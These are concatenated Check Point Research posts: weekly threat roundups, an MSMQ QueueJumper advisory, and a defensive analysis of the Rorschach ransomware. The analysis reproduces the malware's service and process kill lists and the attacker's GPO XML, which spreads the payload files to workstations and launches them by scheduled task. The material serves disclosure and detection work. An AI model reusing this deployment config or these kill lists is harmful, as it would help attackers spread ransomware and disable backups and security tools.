• German biotech company Evotec has suffered a cyber-attack prompted the company to shut down its digital infrastructure. The company confirms that business is continuing at all sites, although the systems are currently not connected to the network.
• Intelligence documents containing “Top Secret” information were leaked through online Discord channels. The leaked information includes data related to Russia’s invasion of Ukraine, analysis of potential UK policies on the South China Sea and the activities of a Houthi figure in Yemen.

VULNERABILITIES AND PATCHES

• Check Point Research has discovered three vulnerabilities (CVE-2023-28302, CVE-2023-21769 and CVE-2023-21554) in the “Microsoft Message Queuing” service, commonly known as MSMQ. The most severe of these, dubbed QueueJumper by CPR (CVE-2023-21554), is a critical vulnerability that could allow unauthenticated attackers to remotely execute arbitrary code in the context of the Windows service process mqsvc.exe.

Check Point IPS provides protection against this threat (Microsoft Message Queuing Remote Code Execution (CVE-2023-21554))

• Microsoft’s Patch Tuesday fixes 97 flaws, including one actively exploited zero-day vulnerability (CVE-2023-28252), a privilege elevation vulnerability in the Windows CLFS driver that elevates privileges to SYSTEM, the highest user privilege level in Windows. This vulnerability was first spotted used by Nokoyawa ransomware group.
• Enterprise software vendor SAP has released its April 2023 security updates for several of its products, including three critical-severity vulnerabilities (CVE-2023-27267, CVE-2023-28765 and CVE-2023-29186) impact SAP NetWeaver, SAP BusinessObjects Business Intelligence Platform and OSCommand Bridge of SAP Diagnostics Agent.

THREAT INTELLIGENCE REPORTS

• Check Point Research reports that Emotet which had new malware campaigns during the last month, rose to become the second most prevalent malware. Ahmyth Remote Access Trojan (RAT) was the most prevalent mobile malware and Log4j took top spot once again as the most exploited vulnerability, impacting 44% of organizations globally.

Check Point Harmony Endpoint, Threat Emulation, and IPS provide protection against those threats (Trojan.Win.Emotet; Exploit_Linux_CVE-2021-44228; Apache Log4j Remote Code Execution (CVE-2021-44228))

• Check Point Research flags a sharp increase in cyberattacks targeting IoT Devices, with 41% increase in the average number of weekly attacks per organization during the first two months of 2023, compared to 2022. On average, every week, 54% of organizations suffer from attempted cyber-attacks targeting IoT devices, mostly in Europe followed by APAC and Latin America.

Check Point Quantum IoT Protect provides protection against this threat

• Check Point Research warns about an increase in discussions and in trade of stolen ChatGPT accounts, with a focus on Premium accounts. Cyber criminals leak credentials to ChatGPT accounts, trade premium ChatGPT account and use Bruteforcing tools for ChatGPT, which allow cyber criminals to get around OpenAI’s geofencing restrictions and get access to the previous queries of existing ChatGPT accounts.

The post 17th April – Threat Intelligence Report appeared first on Check Point Research.

Executive Summary

Check Point Research recently discovered three vulnerabilities in the “Microsoft Message Queuing” service, commonly known as MSMQ. These vulnerabilities were disclosed to Microsoft and patched in the April Patch Tuesday update. The most severe of these, dubbed QueueJumper by CPR (CVE-2023-21554), is a critical vulnerability that could allow unauthenticated attackers to remotely execute arbitrary code in the context of the Windows service process mqsvc.exe.

Check Point Research (CPR) is releasing this blog after the patch was implemented to raise awareness of this critical vulnerability and provide defense insights and mitigation recommendations for Windows users. We will release the full technical details later this month, giving users time to patch their machines before publicly disclosing the technical details.

Key Findings

• Three vulnerabilities in the MSMQ service were discovered, with all of them  patched in the April Patch Tuesday update:
  • CVE-2023-21554 (QueueJumper) — unauthenticated Remote Code Execution
  • CVE-2023-21769 — unauthenticated Remote Application Level DoS (service crash)
  • CVE-2023-28302 — unauthenticated Remote Kernel Level DoS (Windows BSOD)
• The most significant vulnerability allows unauthenticated attackers to execute arbitrary code in the context of the Windows service process, mqsvc.exe.
• MSMQ is provided as an optional Windows component and is still available on all Windows operating systems, including the latest Windows Server 2022 and Windows 11

MSMQ

According to Microsoft, Microsoft Message Queuing (“MSMQ” for short),

“is a message infrastructure and a development platform for creating distributed, loosely-coupled messaging applications for the Microsoft® Windows® operating system. Message Queuing applications can use the Message Queuing infrastructure to communicate across heterogeneous networks and with computers that may be offline. Message Queuing provides guaranteed message delivery, efficient routing, security, transaction support, and priority-based messaging.”

The most recent Microsoft documents discussing the service were updated in 2016. Some MSMQ experts published a blog post in January 2020 exploring the retiring trend of the service. Despite being considered a “forgotten” or “legacy” service, MSMQ is still available on all Windows operating systems, including the latest Windows Server 2022 and Windows 11 and is provided as an optional Windows component. Users can easily enable the service via the Control Panel or via PowerShell command “Install-WindowsFeature MSMQ-Services”.

The QueueJumper Vulnerability

The CVE-2023-21554  vulnerability allows an attacker to potentially execute code remotely and without authorization by reaching the TCP port 1801. In other words, an attacker could gain control of the process through just one packet to the 1801/tcp port with the exploit, triggering the vulnerability.

The Impact

We now know the attack vector sends packets to the service port 1801/tcp. In order to have a better understanding of the potential impact in the real world of this service, CPR did a full Internet scan.

Surprisingly, we found that more than ~360,000 IPs have the 1801/tcp open to the Internet and are running the MSMQ service.

Note that this only includes the number of hosts facing the Internet and does not account for computers hosting the MSMQ service on internal networks, where the number should be far more.

The MSMQ service is a “middleware” service that some popular software relies on. When the user installs the popular software, the MSMQ service is enabled on Windows, which may be done without the user’s knowledge.

For example, CPR saw that when installing the official Microsoft Exchange Server, the setup wizard app would enable the MSMQ service in the background if the user selects the “Automatically install Windows Server roles and features that are required to install Exchange” option, which is recommended by Microsoft.

After the installation, the MSMQ service is automatically enabled:

So, it leaves the Exchange Server running with the MSMQ service on the same machine.

The important takeaway is that if MSMQ is enabled on a server, the attacker could potentially exploit this or any MSMQ vulnerability and take over the server. Therefore, we highly recommend administrators to check their servers carefully and follow the listed protection and mitigation recommendations.

Protection & Mitigation

We recommend all Windows admins check their servers and clients to see if the MSMQ service is installed. You can check if there is a service running named ‘Message Queuing’, and TCP port 1801 is listening on the computer. If it is installed, double-check if you need it. Closing unnecessary attack surfaces is always a very good security practice.

For this particular vulnerability we discussed, we recommend users install Microsoft’s official patch as soon as possible. If your business requires MSMQ but is unable to apply Microsoft’s patch right now, you may block the inbound connections for 1801/tcp from untrusted sources with Firewall rules (for example, blocking Internet connections to 1801/tcp for Internet-facing machines), as a workaround.

Check Point IPS has developed and deployed a signature named “Microsoft Message Queuing Remote Code Execution (CVE-2023-21554)” to detect and protect our customers against the QueueJumper vulnerability.

The post QueueJumper: Critical Unauthenticated RCE Vulnerability in MSMQ Service appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 10th April, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• Taiwanese computing hardware giant MSI has suffered a ransomware attack by the recently-founded group Money Message. The group has demanded $4M in ransom, and claims to have stolen source code and databases as part of 1.5TB of information exfiltrated from the company.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.RMShadowCopy)

• A ransomware attack has affected New Jersey Camden County’s police department. According to reports, while the attack has been going on since the middle of March, the department has not yet managed to repair its systems. Meanwhile, criminal investigation files have been locked and are inaccessible.
• Russian hacktivist group NoName057(16) has targeted Finland government websites, in what they claim is a response for Finland joining NATO this week. Among the websites targeted with denial of service attacks were the Finnish parliament websites, as well as the website of exiting Prime Minister Sanna Marin.
• After initially releasing 10GB of data stolen from the city of Oakland, California, in a ransomware attack, the PLAY ransomware group has leaked additional 600GB of information stolen in the attack. The city has confirmed that this batch of data contains personal information of some Oakland residents, in addition to employees’ personal information that was leaked previously.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Play)

• ACRO, the UK’s Criminal Records Office, has stated that the issues that have been affecting its service since January are caused by a cyber security incident. The office’s website has been inactive since the end of March, after online applications were shut down previously. ACRO has instructed users to contact it for service via email.
• Swiss German-language newspaper NZZ has reduced the volume of its publication over the Easter holiday, after its systems have been affected by a ransomware attack.
• Various Muslim-affiliated hacktivist groups have launched “OpIsrael”, targeting Israeli websites with DDoS during the past week. Among the targets hit by Anonymous Sudan, were Israeli government subdomains, as well as websites of universities, hospitals, media journals, airports and Israeli companies.

VULNERABILITIES AND PATCHES

• Apple has released an emergency security patch for macOS Ventura. The patch addresses two critical vulnerabilities (CVE-2023-28205 and CVE-2023-28206), which allowed attackers arbitrary code execution on iPhones. The vulnerabilities were discovered after already being exploited in the wild.
• Researchers have found a series of vulnerabilities affecting the products of Nexx, an IoT smart-device firm. The vulnerabilities could allow an attacker to remotely access and control users’ garage-door, alarm and smart-plug devices.
• VM2, a popular JavaScript library used for sandboxing, has released version 3.9.15 to address a critical sandbox escape vulnerability. The vulnerability (CVE-2023-29017), allows to the attacker to bypass the sandbox and execute arbitrary code on the host machine running the sandbox.
• Cisco has published security advisories regarding vulnerabilities affecting several of its products. Successful exploitation of the vulnerabilities could allow attackers remote code execution or command injection on vulnerable devices.

THREAT INTELLIGENCE REPORTS

• Check Point Research has discovered a new strain of ransomware dubbed Rorschach, which was deployed via DLL sideloading of a legitimate, signed security product. This ransomware is highly customizable with technically unique features previously unseen in ransomware, and is one of the fastest ransomware observed, by the speed of encryption.

Check Point Harmony Endpoint provides protection against this threat.

• Check Point Research highlights the growing underground market selling flight points, hotel rewards and stolen credential of airline accounts. The research shows dedicated brute forcing tools used to steal such accounts and special underground “travel agents” selling discounted flights and hotel reservations using stolen airline and hotel accounts.
• Genesis market, one of the biggest underground markets for stolen credentials and device fingerprints was taken down in a coordinated operation of 17 countries, called Cookie Monster. As part of the operation, 119 users of the platform were arrested.
• An analysis of the new version of the Typhon Reborn malware has been published. The malware, an infostealer widely available for sale on underground forums, has added detection evasion and anti-virtual machine capabilities. Due to its relatively cheap price, researchers estimate that Typhon Reborn will increase in popularity with attack actors in upcoming months.

Check Point Threat Emulation provides protection against this threat (Infostealer.Win.PasswordStealer.A)

The post 10th April – Threat Intelligence Report appeared first on Check Point Research.

Key Findings

• Check Point Research (CPR) and Check Point Incident Response Team (CPIRT) encountered a previously unnamed ransomware strain, we dubbed Rorschach, deployed against a US-based company.
• Rorschach ransomware appears to be unique, sharing no overlaps that could easily attribute it to any known ransomware strain. In addition, it does not bear any kind of branding which is a common practice among ransomware groups.
• The ransomware is partly autonomous, carrying out tasks that are usually manually performed during enterprise-wide ransomware deployment, such as creating a domain group policy (GPO). In the past, similar functionality was linked to LockBit 2.0.
• The ransomware is highly customizable and contains technically unique features, such as the use of direct syscalls, rarely observed in ransomware. Moreover, due to different implementation methods, Rorschach is one of the fastest ransomware observed, by the speed of encryption.
• The ransomware was deployed using DLL side-loading of a Cortex XDR Dump Service Tool, a signed commercial security product, a loading method which is not commonly used to load ransomware. The vulnerability was properly reported to Palo Alto Networks.

Introduction

While responding to a ransomware case against a US-based company, the CPIRT recently came across a unique ransomware strain deployed using a signed component of a commercial security product. Unlike other ransomware cases, the threat actor did not hide behind any alias and appears to have no affiliation to any of the known ransomware groups. Those two facts, rarities in the ransomware ecosystem, piqued CPR interest and prompted us to thoroughly analyze the newly discovered malware.

Throughout its analysis, the new ransomware exhibited unique features. A behavioral analysis of the new ransomware suggests it is partly autonomous, spreading itself automatically when executed on a Domain Controller (DC), while it clears the event logs of the affected machines. In addition, it’s extremely flexible, operating not only based on a built-in configuration but also on numerous optional arguments which allow it to change its behavior according to the operator’s needs. While it seems to have taken inspiration from some of the most infamous ransomware families, it also contains unique functionalities, rarely seen among ransomware, such as the use of direct syscalls.

The ransomware note sent out to the victim was formatted similarly to Yanluowang ransomware notes, although other variants dropped a note that more closely resembled DarkSide ransomware notes (causing some to mistakenly refer to it as DarkSide). Each person who examined the ransomware saw something a little bit different, prompting us to name it after the famous psychological test – Rorschach Ransomware.

Execution Flow

As observed in the wild, Rorschach execution uses these three files:

• cy.exe – Cortex XDR Dump Service Tool version 7.3.0.16740, abused to side-load winutils.dll
• winutils.dll – Packed Rorschach loader and injector, used to decrypt and inject the ransomware.
• config.ini – Encrypted Rorschach ransomware which contains all the logic and configuration.

Upon execution of cy.exe, due to DLL side-loading, the loader/injector winutils.dll is loaded into memory and runs in the context of cy.exe. The main Rorschach payload config.ini is subsequently loaded into memory as well, decrypted and injected into notepad.exe, where the ransomware logic begins.

Figure 1 – Rorschach’s High Level Execution Flow on both endpoints and on Domain Controllers.

Security Solution Evasion

Rorschach spawns processes in an uncommon way, running them in SUSPEND mode and giving out falsified arguments to harden analysis and remediation efforts. The falsified argument, which consists of a repeating string of the digit 1 based on the length of the real argument, rewritten in memory and replaced with the real argument, resulting in a unique execution:

Figure 2 – Rorschach’s process tree spawns processes with falsified arguments.

The ransomware uses this technique to run the following operations:

• Attempt to stop a predefined list of services, using net.exe stop.
• Delete shadow volumes and backups to harden recovery, using legitimate Windows tools such as vssadmin.exe, bcdedit.exe, wmic.exe, and wbadmin.exe
• Run wevutil.exe to clear the the following Windows event logs: Application, Security, System and Windows Powershell.
• Disable the Windows firewall, using netsh.exe

Self-propagation

When executed on a Windows Domain Controller (DC), the ransomware automatically creates a Group Policy, spreading itself to other machines within the domain. Similar functionality was linked in the past to LockBit 2.0, although the Rorschach Ransomware GPO deployment is carried out differently, as described below:

1. %Public% folder of all workstations in the domain.
2. taskkill.exe.

Our colleagues in AhnLab published a more thorough behavioral analysis of another Rorschach variant which provides further details into the operations.

Ransomware Analysis

In addition to the ransomware’s uncommon behavior described above, the Rorschach binary itself contains additional interesting features, differentiating it further from other ransomware.

Binary and Anti-Analysis Protection

The actual sample is protected carefully, and requires quite a lot of work to access. First, the initial loader/injector winutils.dll is protected with UPX-style packing. However, this is changed in such a way that it isn’t readily unpacked using standard solutions and requires manual unpacking. After unpacking, the sample loads and decrypts config.ini, which contains the ransomware logic.

After Rorschach is injected into notepad.exe, it’s still protected by VMProtect. This results in a crucial portion of the code being virtualized in addition to lacking an IAT table. Only after defeating both of these safeguards is it possible to properly analyze the ransomware logic.

Security Solution Evasion

Although Rorschach is used solely for encrypting an environment, it incorporates an unusual technique to evade defense mechanisms. It makes direct system calls using the “syscall” instruction. While previously observed in other strains of malware, it’s quite startling to see this in ransomware.

The procedure involves utilizing the instruction itself, and it goes as follows:

1. The ransomware finds the relevant syscall numbers for NT APIs, mainly related to file manipulation.
2. Rorschach then stores the numbers in a table for future use.
3. When needed, it calls a stub routine that uses the number directly with the syscall instruction instead of using the NT API.

In other words, the malware first creates a syscall table for NT APIs used for file encryption:

Figure 3 – Creation of syscall table for certain NT APIs.

The end of the table is a section with the relevant syscall numbers:

Figure 4 – Section containing the syscall table.

The example below shows how the syscall numbers are used:

Figure 5 – Example use of direct syscall.

This obfuscated process is not required for the ransomware encryption logic, which suggests it was developed to bypass security solutions monitoring direct API calls.

Command Line Arguments

In addition to the hardcoded configuration, the ransomware comes with multiple built-in options, probably for the operators comfort. All of them are hidden, obfuscated, and not accessible without reverse-engineering the ransomware. This table contains some of the arguments that we discovered:

This is only a partial list, with additional arguments suggesting networking capabilities, such as listen, srv and hostfile.

Example of how some of these arguments are used:

Language Based Protection

Before encrypting the target system, the sample runs two system checks that can halt its execution:

• It uses GetSystemDefaultUILanguage and GetUserDefaultUILanguage to determine what language the user is using.
• It exits if the return value is commonly used in CIS countries:

Encryption Process

The Rorschach ransomware employs a highly effective and fast hybrid-cryptography scheme, which blends the curve25519 and eSTREAM cipher hc-128 algorithms for encryption purposes. This process only encrypts a specific portion of the original file content instead of the entire file. The WinAPI CryptGenRandom is utilized to generate cryptographically random bytes used as a per-victim private key. The shared secret is calculated through curve25519, using both the generated private key and a hardcoded public key. Finally, the computed SHA512 hash of the shared secret is used to construct the KEY and IV for the eSTREAM cipher hc-128.

Figure 6 – The Rorschach hybrid-cryptography scheme.

Analysis of Rorschach’s encryption routine suggests not only the fast encryption scheme mentioned previously but also a highly effective implementation of thread scheduling via I/O completion ports. In addition, it appears that compiler optimization is prioritized for speed, with much of the code being inlined. All of these factors make us believe that we may be dealing with one of the fastest ransomware out there.

To verify our hypothesis, we conducted five separate encryption speed tests in a controlled environment (with 6 CPUs, 8192MB RAM, SSD, and 220000 files to be encrypted), limited to local drive encryption only. To provide a meaningful comparison with other known fast ransomware, we compared Rorschach with the notorious LockBit v.3.

The result of the speed tests:

It turned out that we have a new speed demon in town. What’s even more noteworthy is that the Rorschach ransomware is highly customizable. By adjusting the number of encryption threads via the command line argument –-thread, it can achieve even faster times.

Technical Similarity to Other Ransomware

When we compared Rorschach to other well-known ransomware families, we noticed that Rorschach uses a variety of time-honored methods together with some novel ideas in the ransomware industry. The name itself, “Rorschach”, is quite self-explanatory; with deep reverse engineering of the code and its logic, we found certain similarities with some of the more technically advanced and established ransomware groups.

We discussed Rorschach’s hybrid-cryptography scheme in detail above, but we suspect that this routine was borrowed from the leaked source code of Babuk ransomware. See the following code snippets as examples:

Figure 7 – Hybrid-cryptography scheme of Rorschach vs. Babuk.

Rorschach’s inspiration from Babuk is evident in various routines, including those responsible for stopping processes and services. In fact, the code used to stop services through the service control manager appears to have been directly copied from Babuk’s source code:

Figure 8 – Stopping predefined list of services – Rorschach vs. Babuk.

It is also worth noting that the list of services to be stopped in Rorschach’s configuration is identical to that in the leaked Babuk source code. However, the list of processes to be stopped differs slightly, as Rorschach omits notepad.exe, which is used as a target for code injection.

Rorahsach takes inspiration from another ransomware strain: LockBit. First, the list of languages used to halt the malware is exactly the same list that was used in LockBit v2.0  (although the list is commonly used by many Russian speaking groups, and not just LockBit). However, the I/O Completion Ports method of thread scheduling ****is another component where Rorschach took some inspiration from LockBit. The final renaming of the encrypted machine files in Rorschach is implemented via NtSetInformationFile using FileInformationClass FileRenameInformation, just like in LockBit v2.0.

Figure 9 – Renaming of encrypted file using NtSetInformationFile.

As noted before, Rorschach’s code is protected and obfuscated in a way that is unusual for ransomware, and is compiled with compiler optimization to favor speed and code inlining as much as possible. This makes finding similarities with other well-known ransomware families a real brain-buster. But we can still say that Rorschach took the best from the ransomware families with the highest reputation, and then added some unique features of its own.

Ransom Notes

As we noted, Rorschach does not exhibit any clear-cut overlaps with any of the known ransomware groups but does appear to draw inspiration from some of them.

We mentioned previously that Ahnlab reported a similar attack earlier this year. While it was carried out through different means, the ransomware described in the report triggers an almost identical execution flow. However, the resulting ransom note was completely different. The note was actually very similar to those issued by DarkSide, which probably led to this new ransomware being named “DarkSide,” despite the group being inactive since May 2021.

The Rorschach variant we analyzed leaves a different ransom note based on the structure used by Yanlowang, another ransomware group:

Figure 10 – Ransom note from Rorschach.

Conclusion

Our analysis of Rorschach reveals the emergence of a new ransomware strain in the crimeware landscape. Its developers implemented new anti-analysis and defense evasion techniques to avoid detection and make it more difficult for security software and researchers to analyze and mitigate its effects. Additionally, Rorschach appears to have taken some of the ‘best’ features from some of the leading ransomwares leaked online, and integrated them all together. In addition to Rorschach’s self-propagating capabilities, this raises the bar for ransom attacks. The operators and developers of the Rorschach ransomware remain unknown. They do not use branding, which is relatively rare in ransomware operations.

Our findings underscore the importance of maintaining strong cybersecurity measures to prevent ransomware attacks, as well as the need for continuous monitoring and analysis of new ransomware samples to stay ahead of evolving threats. As these attacks continue to grow in frequency and sophistication, it is essential for organizations to remain vigilant and proactive in their efforts to safeguard against these threats.

Harmony Endpoint provides runtime protection against ransomware with instant automated remediation, even in offline mode.

When running on a machine infected with the Rorschach ransomware, Harmony Endpoint Anti-ransomware detected the encryption process in different folders, including modifications made to Harmony Endpoint ‘honeypot’ files. It ran a ranking algorithm that provided a verdict identifying the process as a ransomware.  

Samples/IOCs

Files

Appendix A – Services and processes terminated through GPO by Rorschach

The following services are stopped through a GPO issued by Rorschach, probably to prevent conflicting write orders to Database files (and thus preventing encryption):

The following processes are killed using a group policy (scheduled task) issued by Rorschach executing C:\windows\system32\taskkill.exe. Some are likely terminated to prevent write conflicts, and some are security solutions:

Appendix B – Hardcoded Rorschach configuration

The following is a list of services, hardcoded in its configuration, to be stopped via the service control manager:

AcronisAgent
AcrSch2Svc
backup
BackupExecAgentAccelerator
BackupExecAgentBrowser
BackupExecDiveciMediaService
BackupExecJobEngine
BackupExecManagementService
BackupExecRPCService
BackupExecVSSProvider
CAARCUpdateSvc
CASAD2DWebSvc
ccEvtMgr
ccSetMgr
DefWatch
GxBlr
GxCIMgr
GxCVD
GxFWD
GxVss
Intuit.QuickBooks.FCS
memtas
mepocs
PDVFSService
QBCFMonitorService
QBFCService
QBIDPService
RTVscan
SavRoam
sophos
sql
stc_raw_agent
svc$
veeam
VeeamDeploymentService
VeeamNFSSvc
VeeamTransportSvc
VSNAPVSS
vss
YooBackup
YooIT
zhudongfangyu

The following is a hardcoded list of directories and files to be omitted from encryption:

.
..
#recycle
$Recycle.Bin
1_config.ini
Ahnlab
All Users
AppData
AUTOEXEC.BAT
autoexec.bat
autorun.inf
begin.txt
Boot
boot.ini
bootfont.bin
bootmgfw.efi
bootmgr
bootmgr.efi
bootsect.bak
config.ini
desktop.ini
finish.txt
Google
iconcache.db
Internet Explorer
Mozilla
Mozilla Firefox
NETLOGON
ntldr
ntuser.dat
NTUSER.DAT
ntuser.dat.log
ntuser.dat.LOG1
ntuser.dat.LOG2
ntuser.ini
Opera
Opera Software
Policies
Program Files
Program Files (x86)
ProgramData
scripts
SYSVOL
thumbs.db
Tor Browser
Windows
WINDOWS
Windows.old

The following is a list of process names that during Rorschach’s execution these names are compared to those running on the machine and killed if matched. This is done through a combination of CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, and TerminateProcess. There is some overlap and redundancy to the list of services killed via the service control manager.

AcronisAgent
AcrSch2Svc
agntsvc.exe
BackExecRPCService
backup
BackupExecAgentAccelerator
BackupExecDiveciMediaService
BackupExecJobEngine
bedbg
CAARCUpdateSvc
ccEvtMgr
Culserver
dbeng50.exe
dbeng8
dbsnmp.exe
dbsrv12.exe
DefWatch
encsvc.exe
excel.exe
firefox.exe
infopath.exe
Intuit.QuickBooks.FCS
isqlplussvc.exe
memtas
mepocs
msaccess.exe
MSExchange
msftesql-Exchange
msmdsrv
mspub.exe
MSSQL
mydesktopqos.exe
mydesktopservice.exe
ocautoupds.exe
ocomm.exe
ocssd.exe
onenote.exe
oracle.exe
outlook.exe
PDVFSService
powerpnt.exe
QBCFMonitorService
QBFCService
QBIDPService
SavRoam
sophos
sqbcoreservice.exe
sql.exe
sqladhlp
SQLADHLP
sqlagent
SQLAgent
SQLAgent$SHAREPOINT
SQLBrowser
SQLWriter
steam.exe
synctime.exe
tbirdconfig.exe
thebat.exe
thunderbird.exe
tomcat6
veeam
VeeamDeploymentService
VeeamNFSSvc
VeeamTransportSvc
visio.exe
vmware-converter
vmware-usbarbitator64
WinSAT.exe
winword.exe
wordpad.exe
wrapper.exe
WSBExchange
xfssvccon.exe
YooBackup

Appendix C – Group Policies executed by Rorschach

Transferring its own files to each workstation:

<Files clsid=”{215B2E53-57CE-475c-80FE-9EEC14635851}”>
    <File clsid=”{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}” name=”0305_winutils.dll” status=”0305_winutils.dll” image=”2″ changed=”2023-03-05 08:51:22″ uid=”{3F490769-A341-4220-90A3-51964B4A0C12}” bypassErrors=”1″>
        <Properties action=”U” fromPath=”\\**REDACTED**\sysvol\**REDACTED**.local\scripts\winutils.dll” targetPath=”%Public%\winutils.dll” readOnly=”0″ archive=”1″ hidden=”0″ suppress=”0″ />
    </File>
    <File clsid=”{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}” name=”0305_config.ini” status=”0305_config.ini” image=”2″ changed=”2023-03-05 08:51:22″ uid=”{F513F283-3C66-4C71-9B9B-4CE9BBFCEEF1}” bypassErrors=”1″>
        <Properties action=”U” fromPath=”\\**REDACTED**.local\sysvol\**REDACTED**.local\scripts\config.ini” targetPath=”%Public%\config.ini” readOnly=”0″ archive=”1″ hidden=”0″ suppress=”0″ />
    </File>
    <File clsid=”{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}” name=”0305_cy.exe” status=”0305_cy.exe” image=”2″ changed=”2023-03-05 08:51:22″ uid=”{0A16D469-2648-4849-99C8-95D1B777D59A}” bypassErrors=”1″>
        <Properties action=”U” fromPath=”\\**REDACTED**.local\sysvol\**REDACTED**.local\scripts\cy.exe” targetPath=”%Public%\cy.exe” readOnly=”0″ archive=”1″ hidden=”0″ suppress=”0″ />
    </File>
</Files>

Executing a scheduled task to run the attack:

<TaskV2 clsid=”{D8896631-B747-47a7-84A6-C155337F3BC8}” name=”2_0305_cy.exe” image=”2″ changed=”**REDACTED**” uid=”{3772E17D-6354-4DF1-A73B-8868AC352B23}”>
    <Properties action=”U” name=”2_0305_cy.exe” runAs=”%LogonDomain%\%LogonUser%” logonType=”InteractiveToken”>
        <Task version=”1.2″>
            <RegistrationInfo>
                <Author>**REDACTED**\Administrador</Author>
                <Description></Description>
            </RegistrationInfo>
            <Principals>
                <Principal id=”Author”>
                    <UserId>%LogonDomain%\%LogonUser%</UserId>
                    <LogonType>InteractiveToken</LogonType>
                    <RunLevel>HighestAvailable</RunLevel>
                </Principal>
            </Principals>
            <Settings>
                <IdleSettings>
                    <Duration>PT10M</Duration>
                    <WaitTimeout>PT1H</WaitTimeout>
                    <StopOnIdleEnd>false</StopOnIdleEnd>
                    <RestartOnIdle>false</RestartOnIdle>
                </IdleSettings>
                <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
                <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
                <AllowHardTerminate>true</AllowHardTerminate>
                <AllowStartOnDemand>true</AllowStartOnDemand>
                <Enabled>true</Enabled>
                <Hidden>false</Hidden>
                <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
                <Priority>7</Priority>
            </Settings>
            <Triggers>
                <RegistrationTrigger>
                    <Enabled>true</Enabled>
                </RegistrationTrigger>
                <LogonTrigger>
                    <Enabled>true</Enabled>
                </LogonTrigger>
            </Triggers>
            <Actions Context=”Author”>
                <Exec>
                    <Command>%Public%\cy.exe</Command>
                    <Arguments>–run=**REDACTED**</Arguments>
                </Exec>
            </Actions>
        </Task>
    </Properties>
</TaskV2>

The post Rorschach – A New Sophisticated and Fast Ransomware appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 3rd April, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• Both Windows and macOS versions of 3CXDesktopApp, a VoIP application of 3CX Communications Company, were compromised and used to distribute Trojanized versions in a large-scale supply chain attack. In this widespread campaign, dubbed SmoothOperator, threat actors have misused 3CX’s application with a malicious file that is loaded using 3CXDesktopApp and beacons to the attacker’s infrastructure. More than 600,000 companies worldwide which use 3CX may be affected by this attack. The attack is linked to the North Korean Lazarus group, and is tracked as CVE-2023-29059.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Trojan-Downloader.Win.SmoothOperator; Trojan.Wins.SmoothOperator)

• Australia’s largest gambling and entertainment firm, Crown Resorts, has disclosed that it is being extorted by CL0P ransomware group. This extortion attempt is also a result of CL0P’s group exploitation of Fortra GoAnywhere vulnerability.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Ransomware.Wins.Clop; Ransomware.Win.Clop; Ransomware_Linux_Clop)

• The LockBit ransomware group leaked the files taken from South Korean National Tax Service (NTS) on the group’s shame blog, after the agency had not paid the ransom that was demanded.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Ransomware.Win.LockBit; Ransomware.Wins.Lockbit)

• American debt management firm NCB has confirmed that information of 500,000 customers has been disclosed in a security breach. According to the company, the compromised data included both personal and financial information like account balances, salaries, credit card numbers and more.
• TMX Finance, a US based consumer lending company, and its subsidiaries (TitleMax, TitleBucks, and InstaLoan) have reported a data breach that exposed the personal data of over 4.8 million customers. The breach occurred in December 2022 but was discovered only in February 2023.
• The Netherlands’ national railway company, NS, has notified about 780,000 customers that their data may have been accessed in a potential data breach.

VULNERABILITIES AND PATCHES

• Customers of QNAP have been advised to take necessary measures to protect their Linux-powered network-attached storage (NAS) devices against a high-severity Sudo privilege escalation vulnerability (CVE-2023-22809).
• Researchers analyzed a high-risk Cross-Site Scripting vulnerability (CVE-2023-23383) in Azure Service Fabric Explorer (SFX) dubbed ‘Super FabriXss’ that could lead to unauthenticated remote code execution.
• Researchers have discovered a critical remote code execution vulnerability (CVE-2023-25076) in the SNIProxy open-source tool. The vulnerability exists if a user is utilizing wildcard backend hosts when configuring SNIProxy.
• Threat actors are actively exploiting a now fixed vulnerability in Elementor Pro, a widely-used WordPress plugin with over 11 million website users. The plugin enables easy website building for WooCommerce.

THREAT INTELLIGENCE REPORT

• Check Point Research has released an extensive publication and analysis of the Rhadamanthys infostealer that was launched on the dark web in September 2022. CPR showcases a step-by-step disassembly breakdown of how the malware compiles its own database of stolen Google Chrome information in order to send back to the C2 server.

Check Point Threat Emulation provides protection against this threat (InfoStealer.Wins.Rhadamanthys)

• Researchers have been tracking the hacktivist group Anonymous Sudan, which had been engaged in launching multiple DDoS attacks on organizations in Europe, Australia, Israel and more, often in response to what is perceived as anti-Muslim activity. The group is currently considered and identified as a sub-group of the Russia affiliated hacktivists group Killnet, and supports its agendas.
• Researchers have alerted on a new attack vector in Azure Active Directory (AAD), which is based on a common AAD misconfiguration, exposing misconfigured apps to unauthorized access. Among the vulnerable Microsoft applications also the Bing.com application. The attack can allow unauthorized access and modification of search results.
• Several leading investigative news outlets published an analysis of documents belonging to a Russian IT contractor named NTC Vulkan. The documents include information about projects that were done by the contractor for the Russian GRU Unit 74455, also known as Sandworm Team.

The post 3rd April – Threat Intelligence Report appeared first on Check Point Research.